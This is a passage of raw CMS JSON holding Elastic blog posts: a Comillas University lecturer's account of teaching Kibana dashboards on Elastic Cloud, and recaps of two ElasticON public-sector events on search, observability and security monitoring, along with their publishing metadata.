cases in data visualization is the creation of dashboards for monitoring. Most versatile tools are not well equipped to present information that is updated in real time. However, this is highly demanded by the industry. If our students run into any of those use cases, we want them to have the expertise to make the best choice.\u003c/p\u003e\u003cp\u003eI have always considered that collaborating with universities is the best investment that companies can make. During my time in the industry I tried to put it into practice. Not only does the community perceive these companies as entities that care about building future generations, but also students have the opportunity to become familiar with their products.\u003c/p\u003e\u003cp\u003eAs a recent graduate, if you have to select a cloud or a database provider, it is likely that your experience as a college student will influence your decision. Those were my thoughts as a rookie teacher when I joined the university two years ago. I was willing to establish cooperation agreements with as many companies as possible to provide a quality, industry-linked education for our students. Most of the outreach I made never materialized. But one of the few exceptions that saw the potential of this collaboration to raise awareness of their products was Elastic. The subject of data visualization was part of the master’s degree in Big Data Technologies and Advanced Analytics, and when the program launched there were only 25 students. From the beginning, Elastic provided extended use of \u003ca href=\"/cloud\"\u003eElastic Cloud\u003c/a\u003e, the official service for running the Elastic Stack in the cloud, without any intrusive ads or tradeoffs. Two years later, interest in data visualization has grown and is taught in several programs. In the last edition, around 200 students made use of Elastic Cloud to run \u003ca href=\"/elasticsearch\"\u003eElasticsearch\u003c/a\u003e and \u003ca href=\"/kibana\"\u003eKibana\u003c/a\u003e.\u003c/p\u003e\u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt123ce97b9ba00f60/5f11d1f17523cd1c482ba8f9/blog-cloud-ed-kibana-dashboard.jpg\" data-sys-asset-uid=\"blt123ce97b9ba00f60\" alt=\"Some examples of Kibana dashboards created by our students \" style=\"display: block;margin: auto;\"/\u003e\u003c/p\u003e\u003cfigcaption\u003eSome examples of Kibana dashboards created by our students\u003c/figcaption\u003e\u003cp\u003eThis deployment has not only allowed us to train our students in the use of Kibana, but having a cloud service during the recent restrictions also helped us to complete the semester without altering the content of the sessions.\u003c/p\u003e\u003ch2\u003eKibana as a business and teaching tool\u003c/h2\u003e\u003cp\u003eTeaching telecommunication engineers or post-graduates in Big Data and Advanced Analytics in the use of these tools is expected. But data visualization is not only taught in engineering degrees and scientific postgraduate courses, but it is also part of some double degrees such as the degree in \u003ca href=\"https://www.comillas.edu/en/degrees/dual-degree-program-in-business-administration-and-management-ade-and-business-analytics-e-2-analytics\"\u003eBusiness Administration and Management and Business Analysis\u003c/a\u003e or the degree in \u003ca href=\"https://www.comillas.edu/en/degrees/dual-degree-program-in-business-analytics-and-law-e-3-analytics\"\u003eBusiness Analysis and Law\u003c/a\u003e. Since companies are getting more and more data centric, it’s not difficult to picture an executive downloading data from an API. Or a lawyer using SQL to query a database. Or a business analyst making predictions using a deep-learning algorithm.\u003c/p\u003e\u003cp\u003eTheir skills will be different than those of a computer engineer who received several years of training in software architecture and coding, but being able to do simple website scraping, or understanding the concepts behind a machine learning algorithm, or being able to build a dashboard with social network data can be of great support for their core business. And that’s the ultimate goal: that our students leave college better prepared, mastering actual industry tools that will make them better professionals.\u003c/p\u003e\u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blte3d59db3b0de6f0d/5f11d1a15bbd1b7f3aca86f5/blog-cloud-ed-success.jpg\" data-sys-asset-uid=\"blte3d59db3b0de6f0d\" alt=\"Program success rates\" style=\"display: block;margin: auto;width: 600px;\" width=\"600\"/\u003e\u003c/p\u003e\u003cfigcaption\u003eSuccess rates of these programs\u003c/figcaption\u003e\u003cp\u003e\u003cem\u003eSee what tools and resources are available to you through our new \u003c/em\u003e\u003ca href=\"/community/students-and-educators\"\u003e\u003cem\u003eElastic for Students and Educators\u003c/em\u003e\u003c/a\u003e\u003cem\u003e\u0026nbsp;program.\u003c/em\u003e\u003c/p\u003e","category":[{"title":"User Stories (not in use)","key":"customers","tags":[],"locale":"en-us","uid":"blt26ff0a1ade01f60d","created_by":"sys_blt57a423112de8a853","updated_by":"blt3044324473ef223b70bc674c","created_at":"2018-08-27T12:42:07.232Z","updated_at":"2024-05-10T13:44:13.133Z","ACL":{},"_version":4,"label_l10n":"Customers","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-15T21:04:11.996Z","user":"blt36e890d06c5ec32c"}}],"created_at":"2020-07-17T16:24:12.073Z","created_by":"bltf6ab93733e4e3a73","date_localized":null,"disclaimer":[],"full_bleed_image":{"uid":"blt41df0227e9d794d9","created_by":"bltf6ab93733e4e3a73","updated_by":"bltf6ab93733e4e3a73","created_at":"2020-07-17T16:34:04.747Z","updated_at":"2020-07-17T16:34:04.747Z","content_type":"image/png","file_size":"89233","filename":"blog-banner-virtual-stack.png","title":"blog-banner-virtual-stack.png","ACL":{},"_version":1,"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2020-07-20T18:05:22.251Z","user":"bltf6ab93733e4e3a73"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt41df0227e9d794d9/5f11d2fc0930a40780285baa/blog-banner-virtual-stack.png"},"industry":["education"],"level":[],"markdown_l10n":"","newsfeed":["blt7431c38caf6a609d"],"popular_topics":[],"product":["elastic cloud","elasticsearch","kibana"],"publish_date":"2020-07-20T16:00:00.000Z","rtp_general_l10n":"","rtp_homepage_l10n":"","seo":{"seo_title_l10n":"","seo_description_l10n":"Find out how Comillas University in Spain has been using Elastic Cloud to make sure social distancing doesn't impact their students' ability to learn.","canonical_tag":"","twitter":{"creator":""},"og_markup":{"facebook_profile_id":""},"social":{"paragraph_l10n":""},"noindex":false},"services_events":[],"tags":[],"tags_blog_type":["blt9ac2c859f49c83e0"],"tags_campaigns":[],"tags_culture":[],"tags_elastic_stack":[{"_version":1,"locale":"en-us","uid":"blt3d820a0eae1c9158","ACL":{},"created_at":"2020-06-17T03:35:53.368Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"elasticsearch","label_l10n":"Elasticsearch","tags":[],"title":"Elasticsearch","updated_at":"2020-06-17T03:35:53.368Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:24:20.290Z","user":"blt4b2e1169881270a8"}},{"_version":1,"locale":"en-us","uid":"blt8b37b4b3ec0fe838","ACL":{},"created_at":"2020-06-17T03:36:06.107Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"kibana","label_l10n":"Kibana","tags":[],"title":"Kibana","updated_at":"2020-06-17T03:36:06.107Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:24:20.315Z","user":"blt4b2e1169881270a8"}},{"_version":1,"locale":"en-us","uid":"blt6f3b5313b04c2729","ACL":{},"created_at":"2023-11-06T21:49:22.691Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"customer-story","label_l10n":"Customer story","tags":[],"title":"Customer story","updated_at":"2023-11-06T21:49:22.691Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:18.115Z","user":"blt4b2e1169881270a8"}}],"tags_event_type":[],"tags_industry":[{"_version":6,"locale":"en-us","uid":"blt250fefd1c4d36a4c","ACL":{},"created_at":"2020-06-17T03:22:54.278Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"education-nonprofit","label_l10n":"Education \u0026 non profit","tags":[],"title":"Education \u0026 non-profit","updated_at":"2020-08-13T16:41:17.070Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:17.286Z","user":"blt4b2e1169881270a8"}}],"tags_observability_labs":[],"tags_partner":[],"tags_role":[],"tags_stage":[],"tags_topic":[],"tags_use_case":[{"_version":2,"locale":"en-us","uid":"bltcb543cd010a1e2a8","ACL":{},"created_at":"2020-06-17T03:33:30.831Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"cloud","label_l10n":"Cloud","tags":[],"title":"Cloud","updated_at":"2020-07-06T22:20:17.019Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:05:21.552Z","user":"blt4b2e1169881270a8"}}],"thumbnail_image":{"uid":"blt86176449351f0964","created_by":"bltf6ab93733e4e3a73","updated_by":"bltf6ab93733e4e3a73","created_at":"2020-07-17T16:34:01.262Z","updated_at":"2020-07-17T16:34:01.262Z","content_type":"image/png","file_size":"70582","filename":"blog-thumb-virtual-stack.png","title":"blog-thumb-virtual-stack.png","ACL":{},"_version":1,"is_dir":false,"tags":[],"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2020-07-20T18:05:22.251Z","user":"bltf6ab93733e4e3a73"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt86176449351f0964/5f11d2f991afb901b86d6c27/blog-thumb-virtual-stack.png"},"title":"The benefits of cloud education in pandemic times","title_l10n":"The benefits of cloud education in pandemic times","updated_at":"2024-04-29T15:25:34.495Z","updated_by":"blt3044324473ef223b70bc674c","url":"/blog/the-benefits-of-cloud-education-in-pandemic-times","use_case":[],"versions":[],"weekly_category":[],"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-15T21:07:21.347Z","user":"blt36e890d06c5ec32c"}},{"_version":5,"locale":"en-us","uid":"blt4e89343e583689aa","ACL":{},"abstract_l10n":"At our ElasticON US Federal event, organizations across the federal government shared how they are leveraging Elastic to achieve their mission. Read more about the event, including takeaways from the key sessions.","author":["blt5e0f2d4ca4b144bc"],"body_l10n":"\u003cp\u003eAfter a year of accelerated change in the federal industry, the \u003ca href=\"/elasticon/public-sector/federal#overview\"\u003eFederal Public Sector event\u003c/a\u003e focused on the progress you’ve made, the trends demanding your attention, and the Elastic capabilities that continue to guide federal agencies, offices, and departments towards a search-enabled future.\u0026nbsp;\n\u003c/p\u003e\u003cp\u003eWith a theme of\u0026nbsp;\u003cem\u003eAccelerate the mission. Start with search\u003c/em\u003e, the ElasticON US Federal event centered around some key takeaways:\u0026nbsp;\n\u003c/p\u003e\u003cul\u003e\n\t\u003cli aria-level=\"1\"\u003eData volumes will increase regardless of the size, scape, or scope of your federal focus. Having the tools to adapt processes at speed and scale can be the difference between mission success or failure.\u003c/li\u003e\n\t\u003cli aria-level=\"1\"\u003eWhether your focus is to enable business visibility, optimize infrastructure and applications, or protect your digital ecosystem, the power of search is the catalyst for becoming an insights-driven organization.\u003c/li\u003e\n\t\u003cli aria-level=\"1\"\u003eYour security posture should center on a consolidated, unified analyst experience for security and observability in all operations. Elastic bridges the gap between all silos, operations, and domains to deliver a central hub for detecting, analyzing, and acting on all threats before they put the mission at risk.\u003c/li\u003e\n\t\u003cli aria-level=\"1\"\u003eFederal-specific concerns of speed, networking, accessibility, tracking, and data security are built into the latest releases so that Elastic can bring more responsiveness than ever to public sector projects.\u003c/li\u003e\n\u003c/ul\u003e\u003cp\u003eUsing the highlights below as a guide, learn how organizations across the federal government are leveraging Elastic to quickly analyze data, unify intelligence, standardize datasets, and achieve the mission faster.\n\u003c/p\u003e \u003cstrong\u003e\u003ch3\u003eElastic Security in action\u003c/h3\u003e\u003c/strong\u003e\u003cp\u003eEasily the most spirited conversation of the event was \u003ca href=\"/elasticon/archive/2021/public-sector/federal/elastic-security-in-action\"\u003eElastic Security in action\u003c/a\u003e, facilitated by Elastic’s Mike Nichols and John Harmon. Bringing together perspectives from both product and mission with Chris Johnson (Director, Cybersecurity Operations Center, NGA), Armando Seay (Co-Founder \u0026 Member Board of Directors, Maryland Innovation Security Institute), and Ed Yardley (Chief Engineer, Valiant), the session provided a comprehensive analysis of the cyber, cloud, supply chain, and compliance capabilities enabled by Elastic Security and how they stand up to the requirements of the federal government of tomorrow. The key to scalability, integration, risk assessment, and threat hunting is an ecosystem of cyber capabilities that can communicate freely to improve response time.\n\u003c/p\u003e \u003cstrong\u003e\u003ch3\u003eEmpowering agencies using Elastic as a service inside government\u003c/h3\u003e\u003c/strong\u003e\u003cp\u003eElastic solutions architects Tristan Ahmadi and Jeremy Woodworth were joined by the Director of Cyber Technologies at ECS, Mike Zakrzewski, to discuss \u003ca href=\"/elasticon/archive/2021/public-sector/federal/empowering-agencies-using-elastic-as-a-service-inside-government\"\u003ehow Elastic Cloud Enterprise (ECE) has impacted the Elastic public sector community\u003c/a\u003e and how it can continue to grow to fit ever-evolving mission needs. From threat detection under tightening budgets to networking disparate systems and adopting a risk-based assessment mindset, Elasticsearch has proven to be the foundational element of management and shared service use cases within the federal government.\u0026nbsp;\n\u003c/p\u003e \u003cstrong\u003e\u003ch3\u003eIntegrating advanced analytics with Elasticsearch\u003c/h3\u003e\u003c/strong\u003e\u003cp\u003eIn a solution application deep-dive, two members of Deloitte’s Analytics \u0026 Cognitive Applied AI practice detailed \u003ca href=\"/elasticon/archive/2021/public-sector/federal/integrating-advanced-analytics-with-elasticsearch\"\u003ehow they used Elasticsearch to help a large federal agency expedite document review\u003c/a\u003e. Applicable to a wide variety of eDiscovery use cases, this session highlighted the flexible and creative development possible when pairing the Elastic Stack with emerging tech (e.g., ML and NLP) to solve complex government client problems. By focusing on enabling human review as opposed to replacing it, Deloitte built a process that helped find documents more efficiently, learn patterns from user decisions, and be more transparent.\n\u003c/p\u003e \u003cstrong\u003e\u003ch3\u003eAchieving cyber mission assurance with near real-time impact\u003c/h3\u003e\u003c/strong\u003e\u003cp\u003eMatt Hackman (ECS) walked through \u003ca href=\"/elasticon/archive/2021/public-sector/federal/achieving-cyber-mission-assurance-with-near-real-time-impact\"\u003ehow Elastic and ECS support the Mission Assurance Decision Support System (MADSS) program for the Navy\u003c/a\u003e. Focusing on observability, data enrichment, and powerful search in a containerized environment, Hackman guided viewers through the development process, arriving at improved productivity and user acceptance in the MADSS. By correlating data from diverse sources using web-based services and secure, automated data transformation services, MADSS improves responsiveness, predictions, and event analysis for critical network and infrastructure outages.\n\u003c/p\u003e \u003cstrong\u003e\u003ch3\u003eFireside chat with Nicolas M. Chaillan, Air Force Chief Software Officer (CSO)\u003c/h3\u003e\u003c/strong\u003e\u003cp\u003e\u003ca href=\"/elasticon/archive/2021/public-sector/federal/fireside-chat-with-nicolas-m-chaillan-air-force-chief-software-officer\"\u003eIn a final session\u003c/a\u003e, US\u0026nbsp;Air Force’s Chief Software Officer, Nicolas Chaillan, shared his thoughts with Elastic’s VP of Federal, Steven Coles, on the DoD Data Strategy and the DoD Enterprise DevSecOps Initiative (DSOP). From integrating DevSecOps across the services to the importance of having a 360-degree view of data, this fireside chat underscored how the shift to agile and infrastructure as code improve\u0026nbsp;efficiency and provide\u0026nbsp;more robust security across the DoD.\n\u003c/p\u003e\u003ch2\u003eContinue the conversation\u003c/h2\u003e\u003cp\u003eWhether you were able to join us live or not, we want to help you keep the learning and community connections alive. We’re always happy to put you in touch with other public sector users to discuss use cases. Email us at \u003cstrong\u003e\u003ca href=\"mailto:federal@elastic.co\"\u003efederal@elastic.co\u003c/a\u003e\u003c/strong\u003e\u0026nbsp;or join in the \u003ca href=\"https://elastic-uspubsec.slack.com/join/signup#/\"\u003eElastic Public Sector Slack workspace\u003c/a\u003e, an online forum dedicated to the US\u0026nbsp;public sector community.\u0026nbsp;\n\u003c/p\u003eIf you'd like to view all videos from the federal event as well as content on the state and local government, education, and international markets, \u003ca href=\"/events/videos?eventType=ElasticON\u0026usecase=All\u0026language=English\u0026industry=Government\"\u003eall sessions are now available on demand\u003c/a\u003e. These complete sessions give you the benefit of these experts' insights and details on current government challenges and use cases — no matter the mission and no matter the need.","category":[{"title":"User Stories (not in use)","key":"customers","tags":[],"locale":"en-us","uid":"blt26ff0a1ade01f60d","created_by":"sys_blt57a423112de8a853","updated_by":"blt3044324473ef223b70bc674c","created_at":"2018-08-27T12:42:07.232Z","updated_at":"2024-05-10T13:44:13.133Z","ACL":{},"_version":4,"label_l10n":"Customers","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-15T21:04:11.996Z","user":"blt36e890d06c5ec32c"}}],"created_at":"2021-05-03T20:31:14.340Z","created_by":"bltda02bad9f9f792f1","date_localized":null,"disclaimer":[],"full_bleed_image":{"uid":"blt36d54f0df6bccb1a","created_by":"bltda02bad9f9f792f1","updated_by":"bltda02bad9f9f792f1","created_at":"2021-05-05T00:29:37.699Z","updated_at":"2021-05-05T00:29:37.699Z","content_type":"image/png","file_size":"147031","filename":"blog-banner-fed.png","title":"blog-banner-fed.png","ACL":{},"_version":1,"is_dir":false,"tags":[],"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2021-05-05T14:57:00.546Z","user":"bltda02bad9f9f792f1"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt36d54f0df6bccb1a/6091e6f171e79f1024c9ae8e/blog-banner-fed.png"},"industry":[],"level":[],"markdown_l10n":"","newsfeed":[],"popular_topics":[],"product":[],"publish_date":"2021-05-05T18:00:00.000Z","rtp_general_l10n":"","rtp_homepage_l10n":"","seo":{"seo_title_l10n":"Perspectives from the federal public sector: Enable mission success with Elastic","seo_description_l10n":"","noindex":false,"canonical_tag":"","twitter":{"creator":""},"og_markup":{"facebook_profile_id":""},"social":{"paragraph_l10n":""}},"services_events":["elasticon"],"tags":[],"tags_blog_type":["blt9ac2c859f49c83e0"],"tags_campaigns":[],"tags_culture":[],"tags_elastic_stack":[{"_version":1,"locale":"en-us","uid":"blt6f3b5313b04c2729","ACL":{},"created_at":"2023-11-06T21:49:22.691Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"customer-story","label_l10n":"Customer story","tags":[],"title":"Customer story","updated_at":"2023-11-06T21:49:22.691Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:18.115Z","user":"blt4b2e1169881270a8"}}],"tags_event_type":[{"_version":3,"locale":"en-us","uid":"blt1671c05cb4d5e1af","ACL":{},"created_at":"2020-06-17T03:41:39.784Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"elasticon","label_l10n":"ElasticON","tags":[],"title":"ElasticON","updated_at":"2021-03-04T18:54:01.311Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-01-25T09:15:42.772Z","user":"blt3e52848e0cb3c394"}}],"tags_industry":[],"tags_observability_labs":[],"tags_partner":[],"tags_role":[],"tags_stage":[],"tags_topic":[],"tags_use_case":[],"thumbnail_image":{"_version":1,"is_dir":false,"uid":"blt0d89f997c4c609d3","ACL":{},"content_type":"image/png","created_at":"2021-05-05T00:29:32.147Z","created_by":"bltda02bad9f9f792f1","file_size":"130467","filename":"blog-thumbnail-fed.png","tags":[],"title":"blog-thumbnail-fed.png","updated_at":"2022-02-11T21:03:01.307Z","updated_by":"bltda02bad9f9f792f1","parent_uid":"blta8bbe6455dcfdb35","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-24T17:27:58.918Z","user":"blt36e890d06c5ec32c"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt0d89f997c4c609d3/6091e6ec162d47104df4b3ba/blog-thumbnail-fed.png"},"title":"Perspectives from the federal public sector: Enable mission success with Elastic","title_l10n":"Perspectives from the federal public sector: Enable mission success with Elastic","updated_at":"2024-04-29T12:39:46.890Z","updated_by":"blt09fe13c35e06a262","url":"/blog/perspectives-from-the-federal-public-sector-enable-mission-success-with-elastic","use_case":[],"versions":[],"weekly_category":[],"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-04-29T12:39:52.531Z","user":"blt09fe13c35e06a262"}},{"_version":5,"locale":"en-us","uid":"blt42b4a67d097b4360","ACL":{},"abstract_l10n":"Our ElasticON Public Sector event for State and Local Government \u0026 Education showcased the tech solutions organizations are using to deliver for their constituents faster. Read more about the event, including takeaways from the key sessions.","author":["blt45aac08f9bccf3df"],"body_l10n":"\u003cp\u003eWith the surge of endpoints and growing demands for access to data, public sector organizations have seen an increase in security threats since the onset of the pandemic. Against this backdrop, Elastic gathered industry leaders to learn how to manage these challenges and demands\u0026nbsp;and build a path toward the future. The recent State and Local Government \u0026 Education ElasticON Public Sector event showcased the tech solutions that are delivering for constituents, faster. What should organizations keep\u0026nbsp;top of mind to achieve these goals? Presenters focused on these takeaways:\n\u003c/p\u003e\u003cul\u003e\n\t\u003cli aria-level=\"1\"\u003eRegardless of the size or purpose of your organization, the volume of data at your disposal will increase. Having the tools to analyze that increased data load and to adapt processes at speed and scale will be critical for efficiency and effectiveness in the future.\u0026nbsp;\u003c/li\u003e\n\t\u003cli aria-level=\"1\"\u003eWhether your focus is to enable business visibility, optimize infrastructure and applications, or protect your digital ecosystem, the power of search is the catalyst for becoming an insights-driven organization.\u003c/li\u003e\n\t\u003cli aria-level=\"1\"\u003eSmall cybersecurity and IT teams require a consolidated, unified analyst experience rooted in security and observability in order to protect the large number of devices, employees, endpoints, and log data in their purview.\u0026nbsp;\u003c/li\u003e\n\t\u003cli aria-level=\"1\"\u003eAs technology is spread across numerous jurisdictions, counties, and institutions, organizations are facing challenges with speed, networking, accessibility, tracking, and data security.\u0026nbsp;\u003c/li\u003e\n\u003c/ul\u003e\u003cp\u003eTo address these challenges, Elastic bridges the gap between silos, organizations, and domains to proactively detect, analyze, and act on threats before they put the institution at risk. And the latest Elastic releases make our capabilities more responsive than ever to the requirements of public sector projects. But don’t just take our word for it. Using the highlights below as a guide, learn how organizations across state and local government and education are leveraging Elastic to quickly analyze data, unify intelligence, and standardize datasets.\u0026nbsp;\n\u003c/p\u003e \u003cstrong\u003e\u003ch3\u003eUsing a risk-based approach to provide cost-effective security\u003c/h3\u003e\u003c/strong\u003e\u003cp\u003eThis unified view of data, threats, and risk was the main focus of the presentation by \u003ca href=\"/elasticon/archive/2021/public-sector/state-local-government-education/using-a-risk-based-approach-to-provide-cost-effective-security\"\u003eBlaine Stubstad (Senior Information Security Engineer) and Adam Pena (Senior Security Engineer) from the State of Arizona Enterprise Security team\u003c/a\u003e. Inundated with large amounts of data to analyze across numerous regulatory frameworks, employee devices, and agencies, and constrained by fiscal budgetary cycles, the team undertook a proof of concept with the goal of increasing the automation and reporting capabilities of its risk assessment and threat intelligence process. Using Elastic, they produced more accurate assessments and models of cybersecurity threats.\u0026nbsp;\n\u003c/p\u003e \u003cstrong\u003e\u003ch3\u003eTales from a security specialist in Salt Lake County\u003c/h3\u003e\u003c/strong\u003e\u003cp\u003eCybersecurity has evolved quite a lot since \u003ca href=\"/elasticon/archive/2021/public-sector/state-local-government-education/tales-from-a-security-specialist-at-salt-lake-county\"\u003eChris Adamson, Information Security Engineer with Salt Lake County\u003c/a\u003e, was tasked to start collecting logs in 2015. What began with proof of concepts on several different solutions has since tinkered its way through to a five-node Elastic cluster. After years of expanding with Elastic, Salt Lake County has refined their dashboards to focus on only what is important to them, with consolidated logs in one place. What took hours and days now takes seconds with Elastic. And what was once a looming threat of phishing and ransomware has turned into an effective defensive posture of “mines and tripwires” to alert the team of attacks.\n\u003c/p\u003e \u003cstrong\u003e\u003ch3\u003eIncreased visibility: Opening the black box of networks\u003c/h3\u003e\u003c/strong\u003e\u003cp\u003eFor \u003ca href=\"/elasticon/archive/2021/public-sector/state-local-government-education/increased-visibility-opening-the-black-box-of-networks\"\u003eOregon Health and Science University (OHSU) network architect Alexander Germain\u003c/a\u003e, the challenge of connecting the many facets of campus and research networks across a state was time consuming and cumbersome. By implementing Elastic and Elastiflow, they are now able to see and fix performance and security issues before their users become aware of them. Increased visibility also helped OHSU detect security threats and address weaknesses in network infrastructure. This flexible approach made it applicable to a wide variety of use cases for visualizing external threats, conducting security investigations, troubleshooting, and getting insights into complex systems.\n\u003c/p\u003e \u003cstrong\u003e\u003ch3\u003eElastic Security in action\u003c/h3\u003e\u003c/strong\u003e\u003cp\u003eFor academic institutions, the need to secure vast amounts of user, behavioral, and endpoint data is constant and the teams charged with securing that data are all too often small. In this session \u003ca href=\"/elasticon/archive/2021/public-sector/state-local-government-education/elastic-security-in-action\"\u003eKevin Wilcox, Information Security Specialist from Appalachian State University, and Tyfanie Wineriter, Database Administrator at The University of Oregon\u003c/a\u003e, discuss the challenges of data security and the pressing need to search, analyze, and act on countless alerts each day. Using Elasticsearch, higher ed can do more with the teams, data, and requirements they have to create a proactive defense that produces actionable fixes, quickly.\u0026nbsp;\n\u003c/p\u003e \u003cstrong\u003e\u003ch2\u003eContinue the conversation\u0026nbsp;\u003c/h2\u003e\u003c/strong\u003e\u003cp\u003eWhether you were able to join us live or not, we want to help you keep the learning and community connections alive. We’re always happy to put you in touch with other public sector users to discuss use cases. Email us at \u003ca href=\"mailto:sled@elastic.co\"\u003esled@elastic.co\u003c/a\u003e directly or join in the \u003ca href=\"https://elastic-uspubsec.slack.com/join/signup#/\"\u003eElastic Public Sector Slack workspace\u003c/a\u003e, an online forum dedicated to the US public sector community.\u0026nbsp;\n\u003c/p\u003eAnd for those wanting to fully dive into the ElasticON experience, \u003ca href=\"/events/videos?eventType=ElasticON\u0026usecase=All\u0026language=English\u0026industry=Government\"\u003eall sessions from the day are now available on demand\u003c/a\u003e, highlighting how Elastic capabilities are meeting challenges and use cases from the field — no matter your charter and no matter when you need them.","category":[{"title":"User Stories (not in use)","key":"customers","tags":[],"locale":"en-us","uid":"blt26ff0a1ade01f60d","created_by":"sys_blt57a423112de8a853","updated_by":"blt3044324473ef223b70bc674c","created_at":"2018-08-27T12:42:07.232Z","updated_at":"2024-05-10T13:44:13.133Z","ACL":{},"_version":4,"label_l10n":"Customers","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-15T21:04:11.996Z","user":"blt36e890d06c5ec32c"}}],"created_at":"2021-05-10T15:17:01.329Z","created_by":"bltda02bad9f9f792f1","date_localized":null,"disclaimer":[],"full_bleed_image":{"uid":"blt4320c61415943112","created_by":"bltda02bad9f9f792f1","updated_by":"bltda02bad9f9f792f1","created_at":"2021-05-10T15:12:49.239Z","updated_at":"2021-05-10T15:12:49.239Z","content_type":"image/png","file_size":"182102","filename":"blog-banner-SLED.png","title":"blog-banner-SLED.png","ACL":{},"_version":1,"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2021-05-13T13:23:06.401Z","user":"bltda02bad9f9f792f1"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt4320c61415943112/60994d717ee89a47ff539e9e/blog-banner-SLED.png"},"industry":[],"level":[],"markdown_l10n":"","newsfeed":[],"popular_topics":[],"product":[],"publish_date":"2021-05-13T14:00:00.000Z","rtp_general_l10n":"","rtp_homepage_l10n":"","seo":{"seo_title_l10n":"Overcoming data challenges for state and local government and education with Elastic","seo_description_l10n":"","noindex":false,"canonical_tag":"","twitter":{"creator":""},"og_markup":{"facebook_profile_id":""},"social":{"paragraph_l10n":""}},"services_events":[],"tags":[],"tags_blog_type":["blt9ac2c859f49c83e0"],"tags_campaigns":[],"tags_culture":[],"tags_elastic_stack":[{"_version":1,"locale":"en-us","uid":"blt6f3b5313b04c2729","ACL":{},"created_at":"2023-11-06T21:49:22.691Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"customer-story","label_l10n":"Customer story","tags":[],"title":"Customer story","updated_at":"2023-11-06T21:49:22.691Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:18.115Z","user":"blt4b2e1169881270a8"}}],"tags_event_type":[{"_version":3,"locale":"en-us","uid":"blt1671c05cb4d5e1af","ACL":{},"created_at":"2020-06-17T03:41:39.784Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"elasticon","label_l10n":"ElasticON","tags":[],"title":"ElasticON","updated_at":"2021-03-04T18:54:01.311Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-01-25T09:15:42.772Z","user":"blt3e52848e0cb3c394"}}],"tags_industry":[],"tags_observability_labs":[],"tags_partner":[],"tags_role":[],"tags_stage":[],"tags_topic":[],"tags_use_case":[],"thumbnail_image":{"_version":1,"is_dir":false,"uid":"blt93e01b482ee0f8e6","ACL":{},"content_type":"image/png","created_at":"2021-05-10T15:12:44.087Z","created_by":"bltda02bad9f9f792f1","file_size":"165477","filename":"blog-thumbnail-SLED.png","tags":[],"title":"blog-thumbnail-SLED.png","updated_at":"2022-02-11T21:02:53.832Z","updated_by":"bltda02bad9f9f792f1","parent_uid":"blta8bbe6455dcfdb35","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-24T17:28:04.846Z","user":"blt36e890d06c5ec32c"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt93e01b482ee0f8e6/60994d6c388040592cdec20c/blog-thumbnail-SLED.png"},"title":"Overcoming data challenges for state and local government and education with Elastic","title_l10n":"Overcoming data challenges for state and local government and education with 